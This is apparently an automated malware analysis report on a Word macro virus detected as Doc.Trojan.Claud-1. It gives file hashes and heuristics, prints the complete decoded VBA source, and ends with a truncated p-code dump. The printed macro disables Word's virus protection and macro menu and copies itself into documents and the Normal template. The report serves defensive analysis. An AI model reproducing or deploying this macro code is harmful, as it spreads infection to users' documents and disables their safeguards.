Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5d9fe4373af6f4ab…

MALICIOUS

Office (OLE)

33.5 KB Created: 2000-04-04 15:19:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: dcd31f58fe352d9bd5aae39ee794b34a SHA-1: ce8b9303b80c3d534e6c227e570ebb256d4c1c8f SHA-256: 5d9fe4373af6f4abf52bd37be8afd9e1a5e0a6551149cea44553a4053c718a22
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a malicious Office document containing VBA macros. The macro code attempts to infect both the active document and the Normal template by copying its own code, indicating an attempt to establish persistence or spread. The ClamAV detection 'Doc.Trojan.Claud-1' further supports its malicious nature. The specific actions of copying code and saving the modified templates are key indicators of its intent.

Heuristics 2

  • ClamAV: Doc.Trojan.Claud-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Claud-1
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6057 bytes
SHA-256: 011ece025ee48151ec53480eda5c73a411bada77e1a2acdc5334d64d85d021d6
Detection
ClamAV: Doc.Trojan.Claud-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Claudio2"
Attribute VB_Base = "1Normal.Claudio2"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_close()
On Error Resume Next
Dim jota As Integer, i As Integer, y As Integer, cadecodi As String
 Set AD = ActiveDocument.VBProject.VBComponents.Item(1)
 Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
  CommandBars("tools").Controls("macro").Enabled = False
  Options.VirusProtection = False
  y = 0
  If AD.Name = "Claudio2" Then GoTo InfectNormal
  i = NT.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc)
Claudio:
  jota = 0
  jota = AD.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc)
  If jota = 0 Then
   jota = i
   Do While y < NT.CodeModule.ProcCountLines("Document_Close", vbext_pk_Proc)
     y = y + 1
     cadecodi = NT.CodeModule.Lines(jota, 1)
     AD.CodeModule.InsertLines y, cadecodi
     jota = jota + 1
   Loop
   AD.Name = "Claudio2"
   ActiveDocument.SaveAs ActiveDocument.FullName
  Else
    AD.CodeModule.ReplaceLine jota, "Sub Claudio"
    GoTo Claudio
  End If
 GoTo IYGH
InfectNormal:
If NT.Name <> "Claudio2" Then
i = AD.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc)
jota = 0
jota = NT.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc)
  If jota = 0 Then
   jota = i
   Do While y < AD.CodeModule.ProcCountLines("Document_Close", vbext_pk_Proc)
     y = y + 1
     cadecodi = AD.CodeModule.Lines(jota, 1)
     NT.CodeModule.InsertLines y, cadecodi
     jota = jota + 1
   Loop
   NT.Name = "Claudio2"
   NormalTemplate.Save
  Else
    NT.CodeModule.ReplaceLine jota, "Sub Claudio"
    GoTo InfectNormal
  End If
 End If
IYGH:
'Este es un V macro, Elaborado por c l a u d I o
'Este es el Comienzo de la era de los V Claudio
End Sub

' Processing file: /opt/analyzer/scan_staging/260f1af8b51448bea567bd110463cb7c.bin
' ===============================================================================
' Module streams:
' Macros/VBA/Claudio2 - 3531 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_close())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	Dim 
' 	VarDefn jota (As Integer)
' 	VarDefn i (As Integer)
' 	VarDefn y (As Integer)
' 	VarDefn cadecodi (As String)
' Line #3:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set AD 
' Line #4:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set NT 
' Line #5:
' 	LitVarSpecial (False)
' 	LitStr 0x0005 "macro"
' 	LitStr 0x0005 "tools"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	MemSt Enabled 
' Line #6:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #7:
' 	LitDI2 0x0000 
' 	St y 
' Line #8:
' 	Ld AD 
' 	MemLd New 
' 	LitStr 0x0008 "Claudio2"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	GoTo InfectNormal 
' 	EndIf 
' Line #9:
' 	LitStr 0x000E "Document_Close"
' 	Ld vbext_pk_Proc 
' 	Ld NT 
' 	MemLd CodeModule 
' 	ArgsMemLd ProcBodyLine 0x0002 
' 	St i 
' Line #10:
' 	Label Claudio 
' Line #11:
' 	LitDI2 0x0000 
' 	St jota 
' Line #12:
' 	LitStr 0x000E "Document_Close"
' 	Ld vbext_pk_Proc 
' 	Ld AD 
' 	MemLd CodeModule 
' 	ArgsMemLd ProcBodyLine 0x0002 
' 	St jota 
' Line #13:
' 	Ld jota 
' 	LitDI2 0x0000 
' 	Eq 
' 	IfBlock 
' Line #14:
' 	Ld i 
' 	St jota 
' Line #15:
' 	Ld y 
' 	LitStr 0x000E "Document_Close"
' 	Ld vbext_pk_Proc 
' 	Ld NT 
' 	MemLd CodeModule 
' 	ArgsMemLd ProcCountLines 0x0002 
' 	Lt 
' 	DoWhile 
' Line #16:
' 	Ld y 
' 	LitDI2 0x0001 
' 	Add 
' 	St y 
' Line #17:
' 	Ld jota 
' 	LitDI2 0x0001 
' 	Ld NT 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	St cadecodi 
' Line #18:
' 	Ld y 
' 	Ld cadecodi 
' 	Ld AD 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #19:
' 	Ld jota 
' 	LitDI2 0x0001 
' 	Add 
' 	St jota 
' Line #20:
' 	Loop 
' Line #21:
' 	LitStr 0x0008 "Claudio2"
' 	Ld AD 
' 	MemSt New 
' Line #22:
' 	Ld A
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.